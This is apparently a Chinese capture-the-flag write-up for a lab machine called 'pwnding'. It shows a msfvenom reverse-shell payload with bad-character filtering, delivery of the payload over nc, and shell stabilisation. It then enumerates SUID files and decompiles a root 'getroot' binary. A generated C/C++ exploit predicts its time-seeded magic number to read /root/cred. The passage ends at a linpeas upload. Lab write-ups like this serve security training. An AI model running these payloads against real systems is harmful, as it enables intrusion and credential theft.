                        \u26a0\ufe0f \u7981\u6b62\u5b57\u7b26\u5217\u8868\uff08\u5341\u516d\u8fdb\u5236\u503c\u53ca\u542b\u4e49\uff09<\/h3>\n\n\n\n\n\n\n\n\n\n\n\n
                        \u5341\u516d\u8fdb\u5236\u503c<\/th>\nASCII \u5b57\u7b26<\/th>\n\u542b\u4e49\/\u539f\u56e0<\/th>\n<\/tr>\n<\/thead>\n
                        0x00<\/code><\/td>\n\\x00<\/code> (NULL)<\/td>\n\u7a7a\u5b57\u8282<\/strong>\uff1a\u5b57\u7b26\u4e32\u7ec8\u6b62\u7b26\uff0c\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u622a\u65ad\u6216\u51fd\u6570\u63d0\u524d\u7ec8\u6b62\uff08\u5982 strcpy<\/code>\uff09\u3002<\/td>\n<\/tr>\n
                        0x20<\/code><\/td>\n\u7a7a\u683c<\/td>\n\u7a7a\u683c\u7b26<\/strong>\uff1a\u5728\u7279\u5b9a\u8f93\u5165\u8fc7\u6ee4\u573a\u666f\u53ef\u80fd\u88ab\u9650\u5236\uff0c\u4f46\u6b64\u5904\u9700\u7ed3\u5408\u4e0a\u4e0b\u6587\u786e\u8ba4\u3002<\/td>\n<\/tr>\n
                        0x0F<\/code><\/td>\nSI (Shift In)<\/td>\n\u63a7\u5236\u5b57\u7b26<\/strong>\uff1a\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u53ef\u80fd\u5e72\u6270\u6570\u636e\u5904\u7406\u6d41\u7a0b\u3002<\/td>\n<\/tr>\n
                        0xCD<\/code><\/td>\n\u00cd<\/code><\/td>\n\u6269\u5c55 ASCII \u5b57\u7b26<\/strong>\uff1a\u5728\u7279\u5b9a\u7f16\u7801\u73af\u5883\u53ef\u80fd\u88ab\u89e3\u6790\u4e3a\u5f02\u5e38\u503c**\u3002<\/td>\n<\/tr>\n
                        0x09<\/code><\/td>\n\\t<\/code> (\u6c34\u5e73\u5236\u8868\u7b26)<\/td>\n\u7a7a\u767d\u7b26<\/strong>\uff1a\u53ef\u80fd\u88ab\u89e3\u6790\u4e3a\u5206\u9694\u7b26\uff0c\u5f71\u54cd\u6570\u636e\u5b8c\u6574\u6027\u3002<\/td>\n<\/tr>\n
                        0x22<\/code><\/td>\n"<\/code> (\u53cc\u5f15\u53f7)<\/td>\n\u7279\u6b8a\u7b26\u53f7<\/strong>\uff1a\u5728\u547d\u4ee4\u884c\u6216\u5b57\u7b26\u4e32\u5904\u7406\u4e2d\u53ef\u80fd\u5f15\u53d1\u8bed\u6cd5\u9519\u8bef\u6216\u6ce8\u5165\u98ce\u9669\u3002<\/td>\n<\/tr>\n
                        0x0A<\/code><\/td>\n\\n<\/code> (\u6362\u884c\u7b26)<\/td>\n\u6362\u884c\u7b26<\/strong>\uff1a\u5e38\u89c1\u8f93\u5165\u7ec8\u6b62\u7b26\uff0c\u53ef\u80fd\u5bfc\u81f4\u8bfb\u53d6\u64cd\u4f5c\u63d0\u524d\u7ed3\u675f\uff08\u5982 read<\/code> \u51fd\u6570\uff09\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/blockquote>\n
                        \u751f\u6210shellcode<\/h3>\n
                        \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=192.168.10.106 LPORT=1234 -b '\\x00\\x20\\x0f\\xcd\\x09\\x22\\x0a' -f raw > payload\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nFound 3 compatible encoders\nAttempting to encode payload with 1 iterations of x64\/xor\nx64\/xor succeeded with size 119 (iteration=0)\nx64\/xor chosen with final size 119\nPayload size: 119 bytes<\/code><\/pre>\n
                        \u52a0\u8f7dshellcode<\/h3>\n
                        \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ nc $IP 6666 < payload      <\/code><\/pre>\n
                        \u53e6\u4e00\u8fb9\u5c31\u5f39\u8fc7\u6765\u4e86\u3002\u3002\u3002<\/p>\n
                        \"image-20250610110132979\"<\/div><\/p>\n
                        \u63d0\u6743<\/h2>\n
                        \u7a33\u5b9ashell<\/h3>\n
                        \u60b2\u4f24.jpg \u6362\u4e86\u4e00\u4e2akali<\/code>\uff0cpwncat-cs<\/code>\u7528\u4e0d\u4e86\u4e86\uff1a<\/p>\n
                        python3 -c 'import pty;pty.spawn("\/bin\/bash")'\nexport TERM=xterm\nCtrl + Z\nstty raw -echo; fg\nstty size\nstty rows 38 columns 116<\/code><\/pre>\n
                        \u6211\u6ca1\u7528\u4e0a\u8ff0\u547d\u4ee4\uff0c\u6211\u9009\u62e9\u4fee\u4e86\u4e00\u4e0b\u4ffa\u7684pwncat-cs<\/code>\u3002\u3002\u3002\u3002<\/p>\n
                        \"image-20250610113754830\"<\/div>
                        \n
                        \"image-20250610113809510\"<\/div><\/p>\n
                        \u4fe1\u606f\u641c\u96c6<\/h3>\n
                        (remote) lamb@pwnding:\/home\/lamb$ ls -la\ntotal 28\ndrwxr-xr-x 2 lamb lamb 4096 Feb 24 07:52 .\ndrwxr-xr-x 3 root root 4096 Feb 19 20:34 ..\nlrwxrwxrwx 1 lamb lamb    9 Feb 19 09:27 .bash_history -> \/dev\/null\n-rw-r--r-- 1 lamb lamb  220 Feb 19 09:23 .bash_logout\n-rw-r--r-- 1 lamb lamb 3526 Feb 19 09:23 .bashrc\n-rw-r--r-- 1 lamb lamb  807 Feb 19 09:23 .profile\n-rw------- 1 lamb lamb    0 Feb 20 03:18 .viminfo\n-rw-r--r-- 1 root root  528 Feb 24 07:52 this_is_a_tips.txt\n-rw-r--r-- 1 lamb lamb   39 Feb 24 07:52 use3e3e3e3e3sr.txt\n(remote) lamb@pwnding:\/home\/lamb$ cat this_is_a_tips.txt\nThere is a fun tool called cupp.\nI heard it's a good social engineering dictionary generator.\nAre there really people that stupid these days? haha.\nThere is only one way to become ROOT, which is to execute getroot!!!\nAnd don't forget, this is a PWN type machine.\n\n\u6709\u4e00\u4e2a\u5f88\u597d\u73a9\u7684\u5de5\u5177\u53eb\u505a cupp.\n\u542c\u8bf4\u90a3\u662f\u4e00\u4e2a\u4e0d\u9519\u7684\u793e\u4f1a\u5de5\u7a0b\u5b66\u5b57\u5178\u751f\u6210\u5668.\n\u73b0\u5728\u771f\u7684\u8fd8\u4f1a\u6709\u4eba\u8fd9\u4e48\u8822\u5417\uff1fhaha.\n\u6210\u4e3a ROOT \u7684\u65b9\u6cd5\u53ea\u6709\u4e00\u6761\uff0c\u5c31\u662f\u6267\u884c getroot !!!\n\u800c\u4e14\u4f60\u4e0d\u8981\u5fd8\u8bb0\u4e86\uff0c\u8fd9\u662f\u4e00\u4e2apwn\u7c7b\u578b\u7684\u673a\u5668.\n(remote) lamb@pwnding:\/home\/lamb$ cat use3e3e3e3e3sr.txt\nflag{3a463d08f2ae11efbeb6000c29094b2d}<\/code><\/pre>\n
                        \u8bf4\u660e\u9700\u8981\u4f7f\u7528cupp<\/code>\u8fd9\u4e2a\u5de5\u5177\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
                        (remote) lamb@pwnding:\/home\/lamb$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/mount\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\n(remote) lamb@pwnding:\/home\/lamb$ find \/ -group lamb  2>\/dev\/null | grep -v proc\n\/var\/lib\/sudo\/lectured\/lamb\n\/home\/lamb\n\/home\/lamb\/.viminfo\n\/home\/lamb\/.profile\n\/home\/lamb\/.bashrc\n\/home\/lamb\/use3e3e3e3e3sr.txt\n\/home\/lamb\/.bash_logout\n\/home\/lamb\/.bash_history<\/code><\/pre>\n
                        \u7136\u540e\u627e\u5230\u4e86\u8fd9\u4e2a\u7a0b\u5e8f\uff0c\u5c1d\u8bd5\u4e0b\u8f7d\u5230\u672c\u5730\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
                        (remote) lamb@pwnding:\/home\/lamb$ whereis getroot\ngetroot: \/usr\/local\/bin\/getroot\n(remote) lamb@pwnding:\/home\/lamb$ getroot\nUsage: getroot <magic_number>\n(remote) lamb@pwnding:\/home\/lamb$ ls -la \/usr\/local\/bin\/getroot\n-rwxr-xr-x 1 root root 18912 Feb 20 02:19 \/usr\/local\/bin\/getroot\n(remote) lamb@pwnding:\/home\/lamb$ file \/usr\/local\/bin\/getroot\n\/usr\/local\/bin\/getroot: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=5b496760c7d2337cf4d56eef4b9a0c2e1c6e8e36, not stripped<\/code><\/pre>\n
                        \u770b\u4e00\u4e0b\u4fdd\u62a4\uff1a<\/p>\n
                        \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ pwn checksec getroot \n[*] '\/home\/kali\/temp\/easypwn\/getroot'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    Stripped:   No<\/code><\/pre>\n
                        IDA<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
                        \/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  double v3; \/\/ xmm0_8\n  __int64 v4; \/\/ rax\n  __int64 v5; \/\/ rax\n  __int64 v6; \/\/ rdx\n  __int64 v7; \/\/ rax\n  int v8; \/\/ ebx\n  unsigned int v9; \/\/ eax\n  __int64 v10; \/\/ rax\n  __int64 v11; \/\/ rax\n  char v13; \/\/ [rsp+10h] [rbp-260h]\n  __int64 v14; \/\/ [rsp+110h] [rbp-160h]\n  char v15; \/\/ [rsp+220h] [rbp-50h]\n  int v16; \/\/ [rsp+240h] [rbp-30h]\n  int v17; \/\/ [rsp+244h] [rbp-2Ch]\n  int v18; \/\/ [rsp+248h] [rbp-28h]\n  char v19; \/\/ [rsp+24Fh] [rbp-21h]\n  double v20; \/\/ [rsp+250h] [rbp-20h]\n  int v21; \/\/ [rsp+258h] [rbp-18h]\n  int v22; \/\/ [rsp+25Ch] [rbp-14h]\n\n  if ( argc > 1 )\n  {\n    v22 = atoi(argv[1]);\n    v9 = time(0LL);\n    srand(v9);\n    v21 = rand() % 86400;\n    generate_normal_distribution();\n    v20 = v3;\n    v16 = (signed int)(5.0 * v3) + v21;\n    v17 = 86399;\n    v10 = std::min<int>(&v16, &v17);\n    v18 = 0;\n    v16 = *(_DWORD *)std::max<int>(&v18, v10);\n    std::allocator<char>::allocator(&v19);\n    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(&v15, "\/root\/cred", &v19);\n    std::allocator<char>::~allocator(&v19);\n    if ( v22 == v16 + 12345 )\n    {\n      std::basic_ifstream<char,std::char_traits<char>>::basic_ifstream(&v13, &v15, 8LL);\n      if ( (unsigned __int8)std::basic_ios<char,std::char_traits<char>>::operator bool(&v14) )\n      {\n        v11 = std::basic_ifstream<char,std::char_traits<char>>::rdbuf(&v13);\n        std::ostream::operator<<(&std::cout, v11);\n      }\n      std::basic_ifstream<char,std::char_traits<char>>::~basic_ifstream(&v13);\n    }\n    v8 = 0;\n    std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&v15);\n  }\n  else\n  {\n    v4 = std::operator<<<std::char_traits<char>>(&std::cerr, "Usage: ", envp);\n    v5 = std::operator<<<std::char_traits<char>>(v4, *argv, v4);\n    v7 = std::operator<<<std::char_traits<char>>(v5, " <magic_number>", v6);\n    std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);\n    v8 = 1;\n  }\n  return v8;\n}<\/code><\/pre>\n
                        \/\/ generate_normal_distribution\ndouble generate_normal_distribution(void)\n{\n  double x; \/\/ ST18_8\n  double v1; \/\/ ST10_8\n  double v2; \/\/ xmm0_8\n  double v3; \/\/ ST08_8\n\n  x = (double)rand() \/ 2147483647.0;\n  v1 = (double)rand() \/ 2147483647.0;\n  v2 = log(x);\n  v3 = sqrt(-2.0 * v2);\n  return cos(6.283185307179586 * v1) * v3;\n}<\/code><\/pre>\n
                        AI\u5ba1\u8ba1\u4ee3\u7801<\/h3>\n
                        \u4e22\u7ed9ai\u770b\u5427\uff1a<\/p>\n
                        \n
                        \u6839\u636e\u63d0\u4f9b\u7684\u4ee3\u7801\uff0c\u6211\u5c06\u4ece\u51fd\u6570\u7b7e\u540d\u3001\u903b\u8f91\u6d41\u7a0b\u3001\u5b89\u5168\u673a\u5236\u548c\u5173\u952e\u51fd\u6570\u56db\u4e2a\u65b9\u9762\u8fdb\u884c\u5168\u9762\u5206\u6790\uff1a<\/p>\n
                        1. **\u51fd\u6570\u7b7e\u540d\u4e0e\u53c2\u6570\u89e3\u6790<\/h3>\n
                        int __cdecl main(int argc, const char **argv, const char **envp)<\/code><\/pre>\n
                          \n
                        • __cdecl<\/code>\u8c03\u7528\u7ea6\u5b9a\uff1a\n
                            \n
                          • C\/C++\u9ed8\u8ba4\u8c03\u7528\u7ea6\u5b9a\uff0c\u53c2\u6570\u4ece\u53f3\u5411\u5de6\u538b\u6808\uff0c\u8c03\u7528\u65b9\u6e05\u7406\u5806\u6808<\/li>\n
                          • \u652f\u6301\u53ef\u53d8\u53c2\u6570\u51fd\u6570\uff08\u5982printf\uff09\uff0c\u65e0\u53c2\u6570\u6570\u91cf\u9650\u5236<\/li>\n<\/ul>\n<\/li>\n
                          • \u53c2\u6570\u7ed3\u6784\uff1a\n
                              \n
                            • argc<\/code>\uff1a\u547d\u4ee4\u884c\u53c2\u6570\u6570\u91cf\uff08\u542b\u7a0b\u5e8f\u540d\uff09<\/li>\n
                            • argv<\/code>\uff1a\u53c2\u6570\u503c\u6570\u7ec4\uff08argv[0]<\/code>=\u7a0b\u5e8f\u8def\u5f84\uff09<\/li>\n
                            • envp<\/code>\uff1a\u73af\u5883\u53d8\u91cf\u6570\u7ec4\uff08\u672a\u4f7f\u7528\uff09<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
                              2. \u6838\u5fc3\u903b\u8f91\u6d41\u7a0b<\/strong><\/h3>\n
                              A. \u53c2\u6570\u6821\u9a8c\u5206\u652f<\/h4>\n
                              if (argc > 1) {\n    \/\/ \u4e3b\u903b\u8f91\n} else {\n    \/\/ \u6253\u5370\u4f7f\u7528\u8bf4\u660e\n    std::cerr << \"Usage: \" << argv[0] << \" \";\n    return 1;\n}<\/code><\/pre>\n
                                \n
                              • \u65e0\u53c2\u6570\u65f6<\/strong>\uff1a\u8f93\u51fa\u5e2e\u52a9\u4fe1\u606f\u5e76\u8fd4\u56de\u9519\u8bef\u78011<\/code><\/li>\n
                              • \u6709\u53c2\u6570\u65f6<\/strong>\uff1a\u8fdb\u5165\u8ba4\u8bc1\u903b\u8f91<\/li>\n<\/ul>\n
                                B. \u8ba4\u8bc1\u673a\u5236\u5b9e\u73b0<\/h4>\n
                                \"a\"<\/div><\/p>\n
                                C. \u6587\u4ef6\u64cd\u4f5c<\/h4>\n
                                if (v22 == v16 + 12345) {\n    std::ifstream file(\"\/root\/cred\");\n    if (file) std::cout << file.rdbuf();\n}<\/code><\/pre>\n
                                  \n
                                • \u6743\u9650\u8981\u6c42<\/strong>\uff1a\u9700root\u6743\u9650\u8bbf\u95ee\/root\/cred<\/code><\/li>\n
                                • \u5b89\u5168\u98ce\u9669<\/strong>\uff1a\u786c\u7f16\u7801\u8def\u5f84\u53ef\u80fd\u5f15\u53d1\u8def\u5f84\u904d\u5386\u6f0f\u6d1e<\/li>\n<\/ul>\n
                                  3. \u5b89\u5168\u673a\u5236\u5206\u6790<\/strong><\/h3>\n
                                  a) \u968f\u673a\u6570\u751f\u6210<\/h4>\n
                                  v9 = time(0LL);\nsrand(v9);  \/\/ \u57fa\u4e8e\u65f6\u95f4\u7684\u79cd\u5b50\nv21 = rand() % 86400;  \/\/ 0-86399\u7684\u968f\u673a\u503c<\/code><\/pre>\n
                                    \n
                                  • \u6f0f\u6d1e<\/strong>\uff1atime(0)<\/code>\u7cbe\u5ea6\u4e3a\u79d2\u7ea7\uff0c\u653b\u51fb\u8005\u53ef\u7206\u7834\u65f6\u95f4\u7a97\u53e3<\/li>\n
                                  • \u6539\u8fdb\u5efa\u8bae<\/strong>\uff1a\u6539\u7528\/dev\/urandom<\/code>\u6216rdrand<\/code>\u6307\u4ee4<\/li>\n<\/ul>\n
                                    b) \u6b63\u6001\u5206\u5e03\u53d8\u6362<\/h4>\n
                                    double generate_normal_distribution() {\n    double u1 = rand() \/ 2147483647.0;  \/\/ [0,1]\u5747\u5300\u5206\u5e03\n    double u2 = rand() \/ 2147483647.0;\n    return cos(2*M_PI*u2) * sqrt(-2*log(u1)); \/\/ Box-Muller\u53d8\u6362\n}<\/code><\/pre>\n
                                      \n
                                    • \u7b97\u6cd5<\/strong>\uff1aBox-Muller\u5c06\u5747\u5300\u5206\u5e03\u8f6c\u4e3a\u6807\u51c6\u6b63\u6001\u5206\u5e03<\/li>\n
                                    • \u4f5c\u7528<\/strong>\uff1a\u589e\u52a0v16<\/code>\u7684\u968f\u673a\u6027\uff08\u504f\u79fb\u00b115\u79d2\uff09<\/li>\n<\/ul>\n
                                      c) \u9b54\u6cd5\u6570\u5b57\u6821\u9a8c<\/h4>\n
                                      v16 = clamp(5*v3 + v21, 0, 86399);\nif (v22 == v16 + 12345)  \/\/ \u9759\u6001\u504f\u79fb<\/code><\/pre>\n
                                        \n
                                      • \u7206\u7834\u96be\u5ea6<\/strong>\uff1a\u7ea686400 * 30 \u2248 2.6e6<\/code>\u79cd\u53ef\u80fd\uff08\u53ef\u63a5\u53d7\uff09<\/li>\n
                                      • \u7f3a\u9677<\/strong>\uff1a\u672a\u9632\u91cd\u653e\u653b\u51fb\uff0c\u6709\u6548\u671f\u4e3a1\u79d2<\/li>\n<\/ul>\n
                                        4. \u5173\u952e\u98ce\u9669\u4e0e\u6539\u8fdb<\/strong><\/h3>\n\n\n\n\n\n\n\n\n
                                        \u98ce\u9669\u70b9<\/th>\n\u5371\u5bb3<\/th>\n\u89e3\u51b3\u65b9\u6848<\/th>\n<\/tr>\n<\/thead>\n
                                        \/root\/cred<\/code>\u786c\u7f16\u7801<\/td>\n\u8def\u5f84\u52ab\u6301<\/td>\n\u914d\u7f6e\u6587\u4ef6\u52a8\u6001\u52a0\u8f7d<\/td>\n<\/tr>\n
                                        \u65f6\u95f4\u79cd\u5b50\u53ef\u9884\u6d4b<\/td>\n\u9b54\u6cd5\u6570\u5b57\u7206\u7834<\/td>\n\u6df7\u5408\u8fdb\u7a0bID+\u786c\u4ef6\u71b5\u6e90<\/td>\n<\/tr>\n
                                        \u65e0\u8f93\u5165\u8fc7\u6ee4<\/td>\n\u7f13\u51b2\u533a\u6ea2\u51fa<\/td>\n\u6dfb\u52a0strtol<\/code>\u9519\u8bef\u68c0\u67e5<\/td>\n<\/tr>\n
                                        \u6587\u4ef6\u672a\u9a8c\u8bc1<\/td>\n\u7b26\u53f7\u94fe\u63a5\u653b\u51fb<\/td>\n\u6dfb\u52a0lstat<\/code>\u6821\u9a8c<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
                                        \u603b\u7ed3<\/h3>\n
                                        \u8be5\u7a0b\u5e8f\u5b9e\u73b0\u4e86\u4e00\u4e2a\u57fa\u4e8e\u52a8\u6001\u9b54\u6cd5\u6570\u5b57\u7684\u8ba4\u8bc1\u673a\u5236\uff0c\u6838\u5fc3\u662f\u901a\u8fc7\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570\u589e\u52a0\u7206\u7834\u96be\u5ea6\u3002\u4e3b\u8981\u6539\u8fdb\u65b9\u5411\uff1a<\/p>\n
                                          \n
                                        1. \u589e\u5f3a\u71b5\u6e90<\/strong>\uff1a\u4f7f\u7528getrandom()<\/code>\u66ff\u4ee3time()+rand()<\/code><\/li>\n
                                        2. \u8def\u5f84\u5b89\u5168<\/strong>\uff1a\u907f\u514d\u786c\u7f16\u7801\u7279\u6743\u8def\u5f84<\/li>\n
                                        3. \u9519\u8bef\u5904\u7406<\/strong>\uff1a\u6dfb\u52a0atoi<\/code>\u7684\u5f02\u5e38\u68c0\u6d4b<\/li>\n
                                        4. \u65e5\u5fd7\u76d1\u63a7<\/strong>\uff1a\u8bb0\u5f55\u5931\u8d25\u5c1d\u8bd5\u9632\u7206\u7834<\/li>\n<\/ol>\n
                                          \n
                                          \u5b8c\u6574\u6267\u884c\u6d41\u7a0b\uff1a\u7528\u6237\u8f93\u5165\u2192\u65f6\u95f4\u71b5\u521d\u59cb\u5316\u2192\u6b63\u6001\u5206\u5e03\u504f\u79fb\u8ba1\u7b97\u2192\u9b54\u6cd5\u6570\u5b57\u6821\u9a8c\u2192\u7279\u6743\u6587\u4ef6\u8bbf\u95ee\u3002\u5176\u8bbe\u8ba1\u9002\u5408\u77ed\u671f\u6709\u6548\u7684\u8ba4\u8bc1\u573a\u666f\uff0c\u4f46\u9700\u52a0\u56fa\u968f\u673a\u6570\u751f\u6210\u73af\u8282-<\/p>\n<\/blockquote>\n
                                          \ud83d\udd11 \u5bc6\u94a5\u751f\u6210\u6d41\u7a0b<\/strong><\/h3>\n
                                            \n
                                          1. \n
                                            \u521d\u59cb\u5316\u968f\u673a\u79cd\u5b50<\/strong><\/p>\n
                                            v9 = time(0LL);  \/\/ \u83b7\u53d6\u5f53\u524d\u65f6\u95f4\u6233\nsrand(v9);       \/\/ \u7528\u65f6\u95f4\u6233\u521d\u59cb\u5316\u968f\u673a\u79cd\u5b50<\/code><\/pre>\n
                                            \uff08\u57fa\u4e8e\u7cfb\u7edf\u65f6\u95f4\uff0c\u5b58\u5728\u53ef\u9884\u6d4b\u6027\u98ce\u9669\uff09<\/em><\/p>\n<\/li>\n
                                          2. \n
                                            \u751f\u6210\u57fa\u7840\u968f\u673a\u6570 v21<\/code><\/strong><\/p>\n
                                            v21 = rand() % 86400;  \/\/ \u751f\u6210 [0, 86399] \u7684\u968f\u673a\u6574\u6570<\/code><\/pre>\n
                                            \uff08\u8986\u76d6\u4e00\u5929\u7684\u603b\u79d2\u6570\uff09<\/em><\/p>\n<\/li>\n
                                          3. \n
                                            \u751f\u6210\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570 z0<\/code><\/strong><\/p>\n
                                            generate_normal_distribution();  \/\/ \u8c03\u7528\u6b63\u6001\u5206\u5e03\u751f\u6210\u51fd\u6570\nv20 = v3;  \/\/ v3 \u4e3a\u51fd\u6570\u8fd4\u56de\u503c z0<\/code><\/pre>\n
                                            \u51fd\u6570\u5185\u90e8\u64cd\u4f5c<\/strong>\uff1a<\/p>\n
                                              \n
                                            • \n
                                              u1 = rand() \/ 2147483647.0<\/code> \u2192 \u5747\u5300\u5206\u5e03\u968f\u673a\u6570 [0,1]<\/p>\n<\/li>\n
                                            • \n
                                              u2 = rand() \/ 2147483647.0<\/code> \u2192 \u5747\u5300\u5206\u5e03\u968f\u673a\u6570 [0,1]<\/p>\n<\/li>\n
                                            • \n
                                              z0 = cos(2\u03c0 * u2) * sqrt(-2 * ln(u1))<\/code><\/pre>\n<\/li>\n<\/ul>\n<\/li>\n
                                            • \n
                                              \u8ba1\u7b97\u4e34\u65f6\u53d8\u91cf temp<\/code><\/strong><\/p>\n
                                              temp = (int)(5.0 * z0) + v21;  \/\/ \u53e0\u52a0\u6b63\u6001\u504f\u79fb\u4e0e\u57fa\u7840\u968f\u673a\u6570<\/code><\/pre>\n<\/li>\n
                                            • \n
                                              \u94b3\u5236 temp<\/code> \u5230\u5408\u6cd5\u8303\u56f4<\/strong><\/p>\n
                                              v16 = std::min(std::max(0, temp), 86399);  \/\/ \u9650\u5236\u5728 [0, 86399]<\/code><\/pre>\n<\/li>\n
                                            • \n
                                              \u751f\u6210\u6700\u7ec8\u5bc6\u94a5 key<\/code><\/strong><\/p>\n
                                              key = v16 + 12345;  \/\/ \u53e0\u52a0\u56fa\u5b9a\u504f\u79fb\u91cf<\/code><\/pre>\n<\/li>\n<\/ol>\n<\/blockquote>\n
                                              \u4f7f\u7528 AI \u7ed9\u51fa\u4e86\u4e0b\u9762\u8fd9\u4e2apayload\u4ee5\u5339\u914d\u524d\u9762\u7684\u903b\u8f91\uff1a<\/p>\n
                                              #include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n#include <math.h>\n\n\/\/ \u751f\u6210\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570\uff08Box-Muller\u53d8\u6362\uff09[2,9](@ref)\ndouble generate_normal_distribution() {\n    double u1 = (double)rand() \/ RAND_MAX;  \/\/ [0,1]\u5747\u5300\u5206\u5e03\n    double u2 = (double)rand() \/ RAND_MAX;  \/\/ [0,1]\u5747\u5300\u5206\u5e03\n    return cos(2 * M_PI * u2) * sqrt(-2 * log(u1));\n}\n\nint main() {\n    \/\/ 1. \u521d\u59cb\u5316\u968f\u673a\u79cd\u5b50\uff08\u57fa\u4e8e\u5f53\u524d\u65f6\u95f4\uff09[2,9](@ref)\n    srand(time(NULL));\n\n    \/\/ 2. \u751f\u6210\u57fa\u7840\u968f\u673a\u6570 v21 \u2208 [0, 86399]\n    int v21 = rand() % 86400;\n\n    \/\/ 3. \u751f\u6210\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570 z0 [2](@ref)\n    double z0 = generate_normal_distribution();\n\n    \/\/ 4. \u8ba1\u7b97\u4e34\u65f6\u503c temp = (int)(5.0 * z0) + v21\n    int temp = (int)(5.0 * z0) + v21;\n\n    \/\/ 5. \u94b3\u5236\u7ed3\u679c\u5230 [0, 86399] \u8303\u56f4\n    temp = (temp < 0) ? 0 : (temp > 86399) ? 86399 : temp;\n\n    \/\/ 6. \u751f\u6210\u6700\u7ec8\u9b54\u6cd5\u6570\u5b57 key = temp + 12345\n    int key = temp + 12345;\n\n    printf("%d\\n", key);\n    return 0;\n}<\/code><\/pre>\n
                                              \u8fdb\u884c\u7f16\u8bd1\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u7528\uff1a<\/p>\n
                                              \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ gcc exp.c -o exp -lm  \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ file exp                                                                                                                                                                \nexp: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=732f39222f1e9627e31e63a54df1026b99b50946, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n
                                              \u4f46\u662f\u53d1\u73b0\u672c\u5730\u751f\u6210\u7684\u4f20\u4e0a\u53bb\u7528\u4e0d\u4e86\uff0c\u6240\u4ee5\u4f20\u4e0a\u53bb\u8fdb\u884c\u7f16\u8bd1\uff0c\u4f46\u662f\u62a5\u9519\u4e86\uff1a<\/p>\n
                                              (remote) lamb@pwnding:\/tmp$ gcc exp.c -o exp -lm\ncollect2: fatal error: cannot find 'ld'\ncompilation terminated.<\/code><\/pre>\n
                                              \u5c1d\u8bd5\u6362\u4e3ac++<\/code>\u4ee3\u7801\uff1a<\/p>\n
                                              #include <iostream>\n#include <random>\n#include <algorithm>\n\nint main() {\n    \/\/ 1. \u521d\u59cb\u5316\u968f\u673a\u6570\u5f15\u64ce\uff08\u57fa\u4e8e\u65f6\u95f4\uff09\n    std::random_device rd;\n    std::mt19937 gen(rd());\n\n    \/\/ 2. \u751f\u6210\u57fa\u7840\u968f\u673a\u6570 v21 \u2208 [0, 86399]\n    std::uniform_int_distribution<int> base_dist(0, 86399);\n    int v21 = base_dist(gen);\n\n    \/\/ 3. \u751f\u6210\u6807\u51c6\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570 (\u03bc=0, \u03c3=1)\n    std::normal_distribution<double> normal_dist(0.0, 1.0);\n    double z0 = normal_dist(gen);\n\n    \/\/ 4. \u8ba1\u7b97\u4e34\u65f6\u503c\n    int temp = static_cast<int>(5.0 * z0) + v21;\n\n    \/\/ 5. \u94b3\u5236\u5230\u5408\u6cd5\u8303\u56f4\n    temp = std::max(0, std::min(temp, 86399));\n\n    \/\/ 6. \u751f\u6210\u6700\u7ec8\u9b54\u6cd5\u6570\u5b57\n    int magic_number = temp + 12345;\n\n    std::cout << magic_number << std::endl;\n    return 0;\n}<\/code><\/pre>\n
                                              \u4fe1\u606f\u641c\u96c6<\/h3>\n
                                              \u5c1d\u8bd5\u8fdb\u884c\u52ab\u6301\uff0c\u4f46\u662f\u53d1\u73b0\u9700\u8981\u8bf7\u6c42\/root\/cred<\/code>\uff0c\u6ca1\u6709\u6743\u9650\uff0c\u524d\u9762\u63d0\u793a\u5230\u4e86\u9700\u8981\u793e\u5de5\u83b7\u53d6\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u4e0a\u4f20linpeas.sh<\/code>\uff1a<\/p>\n
                                              \u53d1\u73b0\u5e38\u5361\u5728cloud<\/code>\uff0c\u5c1d\u8bd5\u8df3\u8fc7\u53bb\uff1a<\/p>\n
